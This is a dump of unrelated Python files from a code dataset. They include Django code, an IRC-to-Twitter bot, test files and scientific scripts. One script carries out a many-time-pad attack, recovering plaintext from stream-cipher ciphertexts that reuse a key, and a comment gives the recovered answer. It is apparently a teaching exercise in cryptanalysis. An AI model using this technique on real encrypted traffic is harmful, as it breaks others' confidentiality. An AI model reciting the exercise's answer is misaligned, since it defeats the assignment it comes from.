id
stringlengths 1
7
| text
stringlengths 6
1.03M
| dataset_id
stringclasses 1
value |
---|---|---|
23607
|
import sys
from ctypes import *
def test_getattr():
class Stuff(Union):
_fields_ = [('x', c_char), ('y', c_int)]
stuff = Stuff()
stuff.y = ord('x') | (ord('z') << 24)
if sys.byteorder == 'little':
assert stuff.x == b'x'
else:
assert stuff.x == b'z'
def test_union_of_structures():
class Stuff(Structure):
_fields_ = [('x', c_int)]
class Stuff2(Structure):
_fields_ = [('x', c_int)]
class UnionofStuff(Union):
_fields_ = [('one', Stuff),
('two', Stuff2)]
u = UnionofStuff()
u.one.x = 3
assert u.two.x == 3
|
StarcoderdataPython
|
3334717
|
<reponame>gabrielaleal/pokebattle<gh_stars>1-10
from rest_framework.permissions import BasePermission, IsAuthenticated
from battles.models import Battle
class IsInBattle(BasePermission):
def has_object_permission(self, request, view, obj):
return request.user in [obj.creator, obj.opponent]
class IsBattleOpponent(BasePermission):
message = "Only battle opponent is allowed."
def has_permission(self, request, view):
battle_pk = view.kwargs.get("pk", None)
battle = Battle.objects.get(pk=battle_pk)
return request.user == battle.opponent
class BattleIsOngoing(IsAuthenticated):
message = "This battle is settled."
def has_permission(self, request, view):
battle_pk = view.kwargs.get("pk", None)
battle = Battle.objects.get(pk=battle_pk)
return battle.status == "ONGOING"
|
StarcoderdataPython
|
1792994
|
<gh_stars>0
# Generated by Django 3.0.4 on 2020-03-06 06:06
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('finance', '0004_auto_20200304_1242'),
]
operations = [
migrations.CreateModel(
name='Transaction',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('transaction_type', models.CharField(choices=[('Credit', 'Credit'), ('Debit', 'Debit')], max_length=20)),
('wallet', models.CharField(choices=[('Mandiri', 'Mandiri'), ('BCA', 'BCA'), ('BRI', 'BRI'), ('Cash', 'Cash')], max_length=20)),
('total', models.IntegerField()),
('description', models.CharField(max_length=255)),
('spending', models.CharField(blank=True, choices=[('Donation', 'Donation'), ('Daily', 'Daily'), ('Holiday', 'Holiday')], max_length=100, null=True)),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
],
),
migrations.DeleteModel(
name='Credit',
),
migrations.DeleteModel(
name='Debit',
),
]
|
StarcoderdataPython
|
1771991
|
from django.conf import settings
import json
def is_json(storage_field):
try:
_ = json.loads(storage_field)
return True
except:
return False
class UserFieldMixin:
"""Mixin that adds the necessary data retrieval and storage
functions to an object storing data from extra fields."""
FIELD_STRING = getattr(settings, "USER_FIELDS_ATTR_NAME", "extra_data")
def retrieve_extra_data(self, extra_field, formatted=False):
"""Function that returns the data stored for a given field."""
storage_field = getattr(self, self.FIELD_STRING)
if not is_json(storage_field):
return None
extra_data = json.loads(storage_field)
key = extra_field.name
if key not in extra_data:
return None
if formatted and extra_data[key]["type"] == "choice":
return extra_data[key]["str"]
else:
return extra_data[key]["data"]
def save_extra_data(self, extra_field, value):
"""Function that saves the data supplied for a given field to the object."""
key = extra_field.name
extra_data = {}
storage_field = getattr(self, self.FIELD_STRING)
if is_json(storage_field):
extra_data = json.loads(storage_field)
extra_data[key] = {}
if extra_field.field_type == "choice":
extra_data[key]["str"] = dict(extra_field.get_choices_tuple())[value]
extra_data[key]["data"] = value
extra_data[key]["type"] = extra_field.field_type
setattr(self, self.FIELD_STRING, json.dumps(extra_data))
self.save()
def save_extra_form_data(self, form):
"""Function that saves all of the extra field data in a form to the object."""
for extra_field in form.extra_fields:
self.save_extra_data(extra_field, form.cleaned_data[extra_field.name])
def delete_extra_data(self, extra_field):
"""Function that deletes all of the data associated with a given field."""
key = extra_field.name
storage_field = getattr(self, self.FIELD_STRING)
if is_json(storage_field):
extra_data = json.loads(storage_field)
if key in extra_data:
del extra_data[key]
setattr(self, self.FIELD_STRING, json.dumps(extra_data))
self.save()
|
StarcoderdataPython
|
108136
|
<gh_stars>1-10
#!/usr/bin/python
# -*- coding: utf-8 -*-
from autonetkit.compilers.device.router_base import RouterCompiler
from autonetkit.nidb import config_stanza
class QuaggaCompiler(RouterCompiler):
"""Base Quagga compiler"""
lo_interface = 'lo:1'
def compile(self, node):
super(QuaggaCompiler, self).compile(node)
def interfaces(self, node):
"""Quagga interface compiler"""
#TODO: put this on the router base?
ipv4_node = self.anm['ipv4'].node(node)
phy_node = self.anm['phy'].node(node)
super(QuaggaCompiler, self).interfaces(node)
# OSPF cost
if phy_node.is_l3device():
node.loopback_zero.id = self.lo_interface
node.loopback_zero.description = 'Loopback'
node.loopback_zero.ipv4_address = ipv4_node.loopback
node.loopback_zero.ipv4_subnet = node.loopback_subnet
def ospf(self, node):
"""Quagga ospf compiler"""
super(QuaggaCompiler, self).ospf(node)
# add eBGP link subnets
node.ospf.passive_interfaces = []
for interface in node.physical_interfaces:
if interface.exclude_igp:
continue # don't configure IGP for this interface
bgp_int = self.anm['ebgp_v4'].interface(interface)
if bgp_int.is_bound: # ebgp interface
node.ospf.passive_interfaces.append(config_stanza(id=interface.id))
subnet = bgp_int['ipv4'].subnet
default_ebgp_area = 0
node.ospf.ospf_links.append(
config_stanza(network=subnet,
area=default_ebgp_area))
def isis(self, node):
"""Sets ISIS links
"""
g_isis = self.anm['isis']
isis_node = g_isis.node(node)
node.isis.net = isis_node.net
node.isis.process_id = isis_node.process_id
|
StarcoderdataPython
|
3250424
|
"""client.py - client for wikitweets"""
import os
import re
import sys
import random
import getopt
import logging
import logging.config
import ConfigParser
import twitter # pip install python-twitter
from twisted.words.protocols import irc
from twisted.internet import reactor, protocol
from twisted.python import log as twisted_log
from . import config
TWEET = logging.INFO + 1
logging.addLevelName(logging.INFO + 1, 'TWEET')
log = logging.getLogger(__name__)
def shorter(item):
"""Make a string shorter.
item -- a unicode string."""
if len(item) > 2:
return item[:-2] + u'\u2026' # ellipsis
return item
class EditsListener(irc.IRCClient):
"""IRC bot that listens to wikipedia edits."""
# edit message looks like this:
# u'\x0314[[\x0307Darin Erstad\x0314]]\x034 \x0310 \x0302http://en.wikipedia.org/w/index.php?diff=650841539&oldid=650491223\x03 \x035*\x03 \x0303Erik255\x03 \x035*\x03 (+2) \x0310\x03'
edit_re = re.compile(
r'^\x0314\[\[\x0307' # <grey>[[<yellow>
r'([^\x03]*)' # Article name
r'\x0314\]\]' # <grey>]]
r'\x034 \x0310 \x0302' # <?><?><blue>
r'([^\x03]*)' # Diff URI
r'\x03 \x035\*\x03 \x0303' # <red><literal *><green>
r'([^\x03]*)' # User name or IP address
)
ip_re = re.compile(
r'^([0-9]{1,3}\.){3}[0-9]{1,3}$') # TODO - IPv6
def __init__(self, cfg, twitter_api):
self.nickname = cfg.irc.nick
self.channel = cfg.irc.channel
self.articles = cfg.articles
self.message_fmt = cfg.twitter.message_fmt
self.twitter_api = twitter_api
def connectionMade(self):
irc.IRCClient.connectionMade(self)
log.info("Connected to IRC")
def connectionLost(self, reason):
irc.IRCClient.connectionLost(self, reason)
log.info("Disconnected from IRC")
# callbacks for events
def signedOn(self):
"""Called when bot has succesfully signed on to server."""
log.info('Signed on to IRC')
log.info('Joining %s', self.channel)
self.join(self.channel)
def privmsg(self, user, channel, msg):
"""This will get called when the bot receives a message."""
user = user.split('!', 1)[0]
msg = msg.decode('utf-8', 'ignore')
if user != 'rc-pmtpa':
# TODO - check for channel ops instead
return
log.debug(u"Incoming message: %r", msg)
m = self.edit_re.match(msg)
if m is None:
# IRC message was not an edit message
return
article = m.group(1)
diffuri = m.group(2)
author = m.group(3)
log.debug(u"Noticed edit of %s by %s", article, author)
if article in self.articles:
return self._tweet_edited_article(article, author, diffuri)
def _tweet_edited_article(self, article, author, diffuri):
log.info(u"[%s] edited by %s: %s", article, author, diffuri)
by_msg = 'anonymously'
if not self.ip_re.match(author):
by_msg = 'by %s' % author
# shorten if >140 chars
message_args = {
'article': article,
'author': author,
'by': by_msg,
'diffuri': u'http://t.co/XXXXXXXXXX',
}
message = self.message_fmt % message_args
while len(message) > 140:
# start truncating arguments
if len(message_args['article']) > 50:
message_args['article'] = shorter(message_args['article'])
if len(message_args['author']) > 16:
message_args['author'] = shorter(message_args['author'])
if len(message_args['by']) > 13:
message_args['by'] = shorter(message_args['by'])
shorter_message = self.message_fmt % message_args
if not len(shorter_message) < len(message):
# Impossibly long body text, time for machete
shorter_message = shorter_message[140:]
message = shorter_message
# We had to use some fake vars since twitter will mess with
# URIs, so do the actual substitution here.
message_args['diffuri'] = diffuri
message = self.message_fmt % message_args
# Do the actual tweet.
log.log(TWEET, message)
if self.twitter_api is not None:
exc = None
for i in range(3):
try:
self.twitter_api.PostUpdate(message)
break
except twitter.TwitterError, e:
log.error("Error posting to twitter (attempt %d): %s",
i + 1, e)
exc = e
else:
# TODO preserve traceback
raise exc
def alterCollidedNick(self, nickname):
"""Generate an altered version of a nickname that caused a collision
to create an unused related name for subsequent registration."""
return "%s%05d" % (nickname, random.randint(0, 2**16))
class EditsListenerFactory(protocol.ClientFactory):
"""A factory for EditsListeners.
A new protocol instance will be created each time we connect to the server.
"""
def __init__(self, cfg, twitter_api):
self.channel = cfg.irc.channel
self.cfg = cfg
self.twitter_api = twitter_api
def buildProtocol(self, addr):
proto = EditsListener(self.cfg, self.twitter_api)
proto.factory = self
return proto
def clientConnectionLost(self, connector, reason):
"""If we get disconnected, reconnect to server."""
connector.connect()
def clientConnectionFailed(self, connector, reason):
print "IRC Connection failed:", reason
reactor.stop()
def usage():
return """%s - wikipedia IRC bot that tweets certain article changes.
Usage: %s [options] <config_file>
Options:
--no-twitter Don't post to twitter, just log the tweet text
-h, --help Show this message and exit
""" % (sys.argv[0], sys.argv[0])
def main():
"""Main entry point for wikitweets"""
do_twitter = True
try:
opts, args = getopt.gnu_getopt(
sys.argv[1:], 'h', ['help', 'no-twitter'])
for o, a in opts:
if o in ('-h', '--help'):
print usage()
return 0
if o in ('--no-twitter',):
do_twitter = False
if len(args) != 1:
raise getopt.GetoptError('config file required.')
config_filename = args[0]
except getopt.GetoptError, e:
print >> sys.stderr, e
print >> sys.stderr, usage()
return 2
if not os.path.exists(config_filename):
print >> sys.stderr, "E: Config file <%s> not found" % config_filename
return 1
# initialise config and logging
try:
cfg = config.Config(config_filename)
#twisted_log.startLogging(sys.stdout)
logging.config.fileConfig(config_filename, disable_existing_loggers=False)
except ConfigParser.NoSectionError, e:
section = e.section
print >> sys.stderr, "E: Missing [%s] section in config file" % section
return 1
log.debug('Starting up')
# initialise Twitter API connection
twitter_api = None
if do_twitter:
twitter_api = twitter.Api(
consumer_key=cfg.twitter.consumer_key,
consumer_secret=cfg.twitter.consumer_secret,
access_token_key=cfg.twitter.access_token_key,
access_token_secret=cfg.twitter.access_token_secret)
user = twitter_api.VerifyCredentials()
log.info("Logged into twitter: %s", user)
# create factory protocol and application
f = EditsListenerFactory(cfg, twitter_api)
# connect factory to this host and port
reactor.connectTCP(cfg.irc.server, cfg.irc.port, f)
# run bot
reactor.run()
if __name__ == '__main__':
sys.exit(main())
|
StarcoderdataPython
|
57298
|
<filename>exs/mundo_3/python/089.py
"""
Desafio 089
Problema: Crie um programa que leia nome e duas notas de vários alunos
e guarde tudo em uma lista composta. No final, mostre um
boletim contendo a média de cada um e permita que o usuário
possa mostrar as notas de cada aluno individualmente.
Resolução do problema:
"""
historicoAlunos = []
dadosAluno = []
while True:
dadosAluno.append(input('NOME: ').strip().capitalize())
dadosAluno.append([float(input('NOTA 1: ')), float(input('NOTA 2: '))])
# Notas menores que 0 e maiores que 10 são inválidas, então solicida novamente em caso verdaidero
while (dadosAluno[1][0] < 0 or dadosAluno[1][0] > 10) or (dadosAluno[1][1] < 0 or dadosAluno[1][1] > 10):
print('-' * 25)
print('Nota inválida, informe notas de 0 a 10...')
dadosAluno[1].clear() # Limpa dados inválidos
print(f'NOME: {dadosAluno[0]}')
dadosAluno[1].append(float(input('NOTA 1: ')))
dadosAluno[1].append(float(input('NOTA 2: ')))
historicoAlunos.append(dadosAluno[:]) # Cópia completa
dadosAluno.clear() # Limpando lista de dados
print('-' * 25)
continuar = input('Continuar [S/N]: ').strip().upper()
# Caso informa uma opção inválida, entrará em loop até que informe uma valida
while continuar not in ('S', 'N'):
print('\nInforme a opção corretamente...')
continuar = input('Continuar [S/N]: ').strip().upper()
print('-' * 25)
if continuar == 'N':
print('\n')
print('+------------------------------+' + f'\n|{"MÉDIAS":^30}|\n' + '+-----+----------------+-------+')
break
for idx, nome in enumerate(historicoAlunos):
if idx == 0:
# Formatando cabeçalho da tabela
print(f'| {"ID":<4}| {"NOME":<15}| {"MÉDIA":<6}|\n' + '+-----+----------------+-------+')
media = (historicoAlunos[idx][1][0] + historicoAlunos[idx][1][1]) / 2
print(f'| {idx:<4}| {historicoAlunos[idx][0]:<15}| {media:<6.1f}|') # Dados da tabela
print('+-----+----------------+-------+')
while True:
id_aluno = int(input('\nID DO ALUNO ou (999 para sair): '))
while 0 > id_aluno or id_aluno > len(historicoAlunos) - 1 and id_aluno != 999:
print('~' * 37)
print('\nInforme um ID correto...')
id_aluno = int(input('ID DO ALUNO ou (999 para sair): '))
print('-' * 37)
if id_aluno == 999:
print('\nPrograma finalizado...')
break
print(f'Aluno(a): {historicoAlunos[id_aluno][0]}\nNotas: {historicoAlunos[id_aluno][1]}')
print('-' * 37)
|
StarcoderdataPython
|
1716835
|
import base64
class FileReader(object):
def __init__(self, file_path):
with open(file_path, 'rb') as filedata:
self.raw_data = base64.b64encode(filedata.read())
self.raw_data = self.raw_data.replace("=", "")
def sanitize(self, char):
my_ord = ord(char)
return str(my_ord).zfill(3)
def read(self, chunk_size):
for i in xrange(0, len(self.raw_data), chunk_size):
yield ''.join(map(self.sanitize, self.raw_data[i:i+chunk_size]))
|
StarcoderdataPython
|
1658441
|
import sys
sys.path.insert(0, '../utils')
import ioManager
import new
sys.path.insert(0, '../connectors')
import transport
sys.path.insert(0,'../sequential')
import ff
inputS = transport.wires(1)
inputR = transport.wires(1)
out = transport.wires(2)
clock = transport.wires(1)
hware = ff.SRFlipFlop(inputS,inputR,out,clock)
iohandler = ioManager.StringIO(hware)
print iohandler.input('0','1','1')
|
StarcoderdataPython
|
3320237
|
<gh_stars>10-100
"""
#Create set of pulses for single qubit randomized benchmarking sequence.
Created on Tue Feb 07 15:01:37 2012
@authors: <NAME>, <NAME>, and <NAME>
"""
import numpy as np
from scipy.linalg import expm
from scipy.constants import pi
from functools import reduce
from itertools import permutations
from random import choice
import csv
def memoize(function):
cache = {}
def decorated(*args):
if args not in cache:
cache[args] = function(*args)
return cache[args]
return decorated
@memoize
def clifford_multiply(C1, C2):
'''
Multiplication table for single qubit cliffords. Note this assumes C1 is applied first.
'''
tmpMult = np.dot(Cliffs[C2].matrix,Cliffs[C1].matrix)
checkArray = np.array([np.abs(np.trace(np.dot(tmpMult.transpose().conj(),Cliffs[x].matrix))) for x in range(24)])
return checkArray.argmax()
#Number of gates that we want
# gateLengths = np.array([2, 4, 8, 12, 16, 24, 32, 48, 64, 80, 96])
# gateLengths = np.array([2, 4, 8, 12, 16, 24, 32, 48, 64, 96])
# gateLengths = np.array([4, 8, 12, 16, 24, 32, 64, 128, 192])
gateLengths = np.array([4, 8, 16, 24, 32, 64, 128, 192])
#Number of randomizations
numRandomizations = 36
#Single qubit paulis
X = np.array([[0, 1],[1, 0]])
Y = np.array([[0, -1j],[1j, 0]])
Z = np.array([[1, 0],[0, -1]]);
I = np.eye(2)
#Basically a structure to contain some infor about the Cliffords
class Clifford(object):
def __init__(self, matrix, inverse, shapeName, shapePhase):
self.matrix = matrix
self.inverse = inverse
self.shapeName = shapeName
self.shapePhase = shapePhase
#Basis Cliffords
Cliffs = {}
Cliffs[0] = Clifford(I, 0, 'QId', None)
Cliffs[1] = Clifford(expm(-1j*(pi/4)*X), 3, 'R90', 0)
Cliffs[2] = Clifford(expm(-2j*(pi/4)*X), 2, 'R180', 0)
Cliffs[3] = Clifford(expm(-3j*(pi/4)*X), 1, 'R90', 0.5)
Cliffs[4] = Clifford(expm(-1j*(pi/4)*Y), 6, 'R90', 0.25)
Cliffs[5] = Clifford(expm(-2j*(pi/4)*Y), 5, 'R180', 0.25)
Cliffs[6] = Clifford(expm(-3j*(pi/4)*Y), 4, 'R90', 0.75)
Cliffs[7] = Clifford(expm(-1j*(pi/4)*Z), 9, 'QId', None)
Cliffs[8] = Clifford(expm(-2j*(pi/4)*Z), 8, 'QId', None)
Cliffs[9] = Clifford(expm(-3j*(pi/4)*Z), 7, 'QId', None)
Cliffs[10] = Clifford(expm(-1j*(pi/2)*(1/np.sqrt(2))*(X+Y)), 10, 'R180', 0.125)
Cliffs[11] = Clifford(expm(-1j*(pi/2)*(1/np.sqrt(2))*(X-Y)), 11, 'R180', -0.125)
Cliffs[12] = Clifford(expm(-1j*(pi/2)*(1/np.sqrt(2))*(X+Z)), 12, 'RXpZ', 0)
Cliffs[13] = Clifford(expm(-1j*(pi/2)*(1/np.sqrt(2))*(X-Z)), 13, 'RXpZ', 0.5)
Cliffs[14] = Clifford(expm(-1j*(pi/2)*(1/np.sqrt(2))*(Y+Z)), 14, 'RXpZ', 0.25)
Cliffs[15] = Clifford(expm(-1j*(pi/2)*(1/np.sqrt(2))*(Y-Z)), 15, 'RXpZ', 0.75)
Cliffs[16] = Clifford(expm(-1j*(pi/3)*(1/np.sqrt(3))*(X+Y+Z)), 17, 'RXpYpZ', 0)
Cliffs[17] = Clifford(expm(-2j*(pi/3)*(1/np.sqrt(3))*(X+Y+Z)), 16, 'RXpYmZ', 0.5)
Cliffs[18] = Clifford(expm(-1j*(pi/3)*(1/np.sqrt(3))*(X-Y+Z)), 19, 'RXpYpZ', -0.25)
Cliffs[19] = Clifford(expm(-2j*(pi/3)*(1/np.sqrt(3))*(X-Y+Z)), 18, 'RXpYmZ', 0.25)
Cliffs[20] = Clifford(expm(-1j*(pi/3)*(1/np.sqrt(3))*(X+Y-Z)), 21, 'RXpYmZ', 0)
Cliffs[21] = Clifford(expm(-2j*(pi/3)*(1/np.sqrt(3))*(X+Y-Z)), 20, 'RXpYpZ', 0.5)
Cliffs[22] = Clifford(expm(-1j*(pi/3)*(1/np.sqrt(3))*(-X+Y+Z)), 23, 'RXpYpZ', 0.25)
Cliffs[23] = Clifford(expm(-2j*(pi/3)*(1/np.sqrt(3))*(-X+Y+Z)), 22, 'RXpYmZ', -0.25)
# Clifford subset (convert 1-based indexing from MATLAB to 0-based indexing)
CliffordSubset = [x-1 for x in [1, 3, 6, 9, 17, 18, 19, 20, 21, 22, 23, 24]]
#Generate random sequences
# randomSeqs = [np.random.randint(0,24, (gateLength-1)).tolist() for gateLength in gateLengths for ct in range(numRandomizations) ]
randomSeqs = [[choice(CliffordSubset) for _ in range(gateLength)] for gateLength in gateLengths for ct in range(numRandomizations) ]
#Interleave a gate
# interleaveGate = 12 #Hadamard
# randomSeqs = [np.vstack((randomSeq, interleaveGate*np.ones(len(randomSeq), dtype=np.int))).flatten(order='F').tolist() for randomSeq in randomSeqs]
#For each sequence calculate inverse and append the final Clifford
randomISeqs = []
for seq in randomSeqs:
totalCliff = reduce(clifford_multiply, seq)
inverseCliff = Cliffs[totalCliff].inverse
randomISeqs.append(seq + [inverseCliff])
#Write out the files now
with open('RB_ISeqs12.txt','wb') as ISeqFID:
writer = csv.writer(ISeqFID)
writer.writerows(randomISeqs)
|
StarcoderdataPython
|
3257777
|
<gh_stars>1-10
# coding=utf-8
import modelscript.scripts.demo.parser
import modelscript.scripts.demo.printer
|
StarcoderdataPython
|
1626939
|
<reponame>kaixin-bai/walle
"""Tests for the Orientation class.
"""
import numpy as np
import pytest
from walle.core import Orientation, UnitQuaternion, Quaternion
class TestOrientation(object):
def axis_angle_vector(self, deg):
theta = np.deg2rad(deg)
unit_vec = np.array([0, 0, 1])
return unit_vec, theta
def rotation_vector(self, deg):
unit_vec, theta = self.axis_angle_vector(deg)
return theta * unit_vec
def quat_from_axang(self, deg):
unit_vec, theta = self.axis_angle_vector(deg)
s = np.cos(theta / 2)
v = unit_vec * np.sin(theta / 2)
return UnitQuaternion(s, v)
def test_init_empty(self):
"""Tests that the default constructor returns an identity quaternion.
"""
ori = Orientation()
actual = ori._quat
expected = UnitQuaternion()
assert actual == expected
def test_init_rot_vec_valid_arr(self):
"""Tests orientation init with rotation vector ndarray.
"""
rot_vec = self.rotation_vector(90)
ori = Orientation(rot_vec)
actual_axis, actual_theta = ori._quat.axis_angle
expected_axis, expected_theta = np.array([0, 0, 1]), np.deg2rad(90)
assert np.allclose(actual_axis, expected_axis) and np.isclose(actual_theta, expected_theta)
def test_init_rot_vec_valid_list(self):
"""Tests orientation init with rotation vector list.
"""
rot_vec = self.rotation_vector(90).tolist()
ori = Orientation(rot_vec)
actual_axis, actual_theta = ori._quat.axis_angle
expected_axis, expected_theta = np.array([0, 0, 1]), np.deg2rad(90)
assert np.allclose(actual_axis, expected_axis) and np.isclose(actual_theta, expected_theta)
def test_init_rot_vec_invalid_list(self):
"""Tests orientation init with invalid rotation vector list.
"""
rot_vec = self.rotation_vector(90).tolist()
rot_vec = [rot_vec[0], rot_vec[1], [rot_vec[2]]]
with pytest.raises(ValueError):
Orientation(rot_vec)
def test_init_rot_vec_invalid_arr(self):
"""Tests orientation init with invalid rotation vector ndarray.
"""
rot_vec = np.random.randn(4)
with pytest.raises(ValueError):
Orientation(rot_vec)
def test_init_axisang_valid_ndarray_float(self):
"""Test orientation with valid axis-angle (ndarray, float).
"""
expected_axis, expected_theta = self.axis_angle_vector(90)
ori = Orientation(expected_axis, expected_theta)
actual_axis, actual_theta = ori._quat.axis_angle
assert np.allclose(actual_axis, expected_axis) and np.isclose(actual_theta, expected_theta)
def test_init_axisang_valid_list_float(self):
"""Test orientation with valid axis-angle (list, float).
"""
expected_axis, expected_theta = self.axis_angle_vector(90)
expected_axis = expected_axis.tolist()
ori = Orientation(expected_axis, expected_theta)
actual_axis, actual_theta = ori._quat.axis_angle
assert np.allclose(actual_axis, expected_axis) and np.isclose(actual_theta, expected_theta)
def test_init_axisang_invalid(self):
"""Test orientation with invalid axis-angle initialization.
"""
with pytest.raises(ValueError):
Orientation([1, 2, 3, 4], 0)
def test_quaternion_rot_from_to_quat(self):
"""Tests the quaternion that rotates `from_quat` to `to_quat`.
"""
quat_from = UnitQuaternion.random()
quat_to = UnitQuaternion.random()
rotation = Orientation.from_quats(quat_from, quat_to)
actual = (rotation * quat_from).quat
expected = quat_to
assert actual == expected
def test_quaternion_rot_from_to_vec_identity(self):
"""Tests the quaternion that rotates a vector to itself.
Should return the indentity quaternion [1, 0, 0, 0].
"""
x = np.array([1, 0, 0])
quat = Orientation.from_vecs(x, x).quat
assert quat.is_identity()
def test_quaternion_rot_from_to_vec_random(self):
"""Tests the quaternion that rotates a vector to another.
"""
x = np.random.randn(3)
quat = UnitQuaternion.random()
y = quat * x
expected = y
actual = Orientation.from_vecs(x, y) * x
assert np.allclose(actual, expected)
|
StarcoderdataPython
|
3298071
|
DATABASE_NAME = '{{cookiecutter.project_name}}'
DATABASE_USER = 'user'
DATABASE_PASSWORD = 'password'
DATABASE_HOST = 'database'
DEBUG = True
|
StarcoderdataPython
|
1753332
|
cts = [
'<KEY>',
'<KEY>',
'32510ba9a7b2bba9b8005d43a304b5714cc0bb0c8a34884dd91304b8ad40b62b07df44ba6e9d8a2368e51d04e0e7b207b70b9b8261112bacb6c866a232dfe257527dc29398f5f3251a0d47e503c66e935de81230b59b7afb5f41afa8d661cb',
'32510ba9aab2a8a4fd06414fb517b5605cc0aa0dc91a8908c2064ba8ad5ea06a029056f47a8ad3306ef5021eafe1ac01a81197847a5c68a1b78769a37bc8f4575432c198ccb4ef63590256e305cd3a9544ee4160ead45aef520489e7da7d835402bca670bda8eb775200b8dabbba246b130f040d8ec6447e2c767f3d30ed81ea2e4c1404e1315a1010e7229be6636aaa',
'3f561ba9adb4b6ebec54424ba317b564418fac0dd35f8c08d31a1fe9e24fe56808c213f17c81d9607cee021dafe1e001b21ade877a5e68bea88d61b93ac5ee0d562e8e9582f5ef375f0a4ae20ed86e935de81230b59b73fb4302cd95d770c65b40aaa065f2a5e33a5a0bb5dcaba43722130f042f8ec85b7c2070',
'32510bfbacfbb9befd54415da243e1695ecabd58c519cd4bd2061bbde24eb76a19d84aba34d8de287be84d07e7e9a30ee714979c7e1123a8bd9822a33ecaf512472e8e8f8db3f9635c1949e640c621854eba0d79eccf52ff111284b4cc61d11902aebc66f2b2e436434eacc0aba938220b084800c2ca4e693522643573b2c4ce35050b0cf774201f0fe52ac9f26d71b6cf61a711cc229f77ace7aa88a2f19983122b11be87a59c355d25f8e4',
'32510bfbacfbb9befd54415da243e1695ecabd58c519cd4bd90f1fa6ea5ba47b01c909ba7696cf606ef40c04afe1ac0aa8148dd066592ded9f8774b529c7ea125d298e8883f5e9305f4b44f915cb2bd05af51373fd9b4af511039fa2d96f83414aaaf261bda2e97b170fb5cce2a53e675c154c0d9681596934777e2275b381ce2e40582afe67650b13e72287ff2270abcf73bb028932836fbdecfecee0a3b894473c1bbeb6b4913a536ce4f9b13f1efff71ea313c8661dd9a4ce',
'315c4eeaa8b5f8bffd11155ea506b56041c6a00c8a08854dd21a4bbde54ce56801d943ba708b8a3574f40c00fff9e00fa1439fd0654327a3bfc860b92f89ee04132ecb9298f5fd2d5e4b45e40ecc3b9d59e9417df7c95bba410e9aa2ca24c5474da2f276baa3ac325918b2daada43d6712150441c2e04f6565517f317da9d3',
'271946f9bbb2aeadec111841a81abc300ecaa01bd8069d5cc91005e9fe4aad6e04d513e96d99de2569bc5e50eeeca709b50a8a987f4264edb6896fb537d0a716132ddc938fb0f836480e06ed0fcd6e9759f40462f9cf57f4564186a2c1778f1543efa270bda5e933421cbe88a4a52222190f471e9bd15f652b653b7071aec59a2705081ffe72651d08f822c9ed6d76e48b63ab15d0208573a7eef027',
'466d06ece998b7a2fb1d464fed2ced7641ddaa3cc31c9941cf110abbf409ed39598005b3399ccfafb61d0315fca0a314be138a9f32503bedac8067f03adbf3575c3b8edc9ba7f537530541ab0f9f3cd04ff50d66f1d559ba520e89a2cb2a83',
]
target = '32510ba9babebbbefd001547a810e67149caee11d945cd7fc81a05e9f85aac650e9052ba6a8cd8257bf14d13e6f0a803b54fde9e77472dbff89d71b57bddef121336cb85ccb8f3315f4b52e301d16e9f52f904'
def str_xor(a, b):
if len(a) > len(b):
return ''.join([hex(ord(x) ^ ord(y))[2:] for (x, y) in zip(a[:len(b)], b)])
else:
return ''.join([hex(ord(x) ^ ord(y))[2:] for (x, y) in zip(a, b[:len(a)])])
def hex_xor(a, b):
if len(a) > len(b):
return ''.join([hex(int(x, 16) ^ int(y, 16))[2:] for (x, y) in zip(a[:len(b)], b)])
else:
return ''.join([hex(int(x, 16) ^ int(y, 16))[2:] for (x, y) in zip(a, b[:len(a)])])
def split_byte(hex_str):
return [hex_str[i:i+2] for i in range(0, len(hex_str), 2)]
def show_ascii(hex_str):
x = int(hex_str, 16)
if (ord('a') <= x <= ord('z')) or (ord('A') <= x <= ord('Z')):
return chr(x)
else:
return '_'
target_len = len(target)
# 将密文截取到与目标相同长度
cts = [x[:target_len] for x in cts]
# 检验密文异或结果
for i in range(0, len(cts)):
for j in range(0, len(cts)):
if i != j:
list_xor = [show_ascii(c) for c in split_byte(hex_xor(cts[i], cts[j]))]
print('[c{} xor c{}]: {}'.format(i, j, ''.join(list_xor)))
print()
# 检验密文与目标异或结果
for i in range(len(cts)):
list_xor = [show_ascii(c) for c in split_byte(hex_xor(cts[i], target))]
print('[c{} xor cx]: {}'.format(i, ''.join(list_xor)))
# result = "The secret message is: When using a stream cipher, never use the key more than once"
|
StarcoderdataPython
|
3255722
|
<filename>src/code/db/analytics/index_feat.py
#!/usr/bin/env python
from collections import OrderedDict
from json import dump
from nltk import pos_tag
from nltk.corpus import stopwords
from context import *
from settings.filemgmt import fileManager
from settings.paths import ADJECTIVES, BOW, CURSE_RAW, CURSES, NOUNS, \
STOPWORDS, SYLLABLES, VERBS
bagOfWords = fileManager(BOW, 'r').split(',')
def bagOfCurse():
curseFile = fileManager(CURSE_RAW, 'r')
return filter(
None, [word.partition(':')[0].strip().strip()
for word in curseFile.split()[1:-1]
if len(word) > 3 and any(char.isdigit() for char in word)]
)
def bagOfStopWords():
stopWords = [str(word) for word in stopwords.words('english')]
stopWords.extend(
[
word for word in bagOfWords if word.isdigit() or len(word) < 2
]
)
return stopWords
def bagOfPOS():
pos = pos_tag(bagOfWords)
adj = [word[0] for word in pos if 'JJ' in word[-1]]
nouns = [word[0] for word in pos if 'NN' in word[-1]]
verbs = [word[0] for word in pos if 'VB' in word[-1]]
return adj, nouns, verbs
def countSyllables(word):
vowels = 'aeiouy'
numVowels = 0
lastWasVowel = False
for wc in word:
foundVowel = False
for v in vowels:
if v == wc:
if not lastWasVowel:
numVowels += 1 # don't count diphthongs
foundVowel = lastWasVowel = True
break
# If full cycle and no vowel found, set lastWasVowel to false
if not foundVowel:
lastWasVowel = False
if (len(word) > 2 and word[-2:] == 'es') or \
(len(word) > 1 and word[-1:] == 'e'):
numVowels -= 1
return numVowels
def bagOfSyllables():
success = {}
for word in bagOfWords:
success[word] = countSyllables(word)
return success
def convertToDict(featList):
return OrderedDict(sorted(intersectLists(featList).items()))
def intersectLists(bagOfFeats):
feat = set(bagOfFeats)
interesects = list(feat & set(bagOfWords))
return {
intersectWord: (bagOfWords.index(intersectWord) + 1)
for intersectWord in interesects
}
def dumpJSON(newFeats, path):
with open(path, 'w') as outputJSON:
dump(newFeats, outputJSON)
if __name__ == '__main__':
curses = bagOfCurse()
curses = convertToDict(curses)
dumpJSON(curses, CURSES)
syllables = bagOfSyllables()
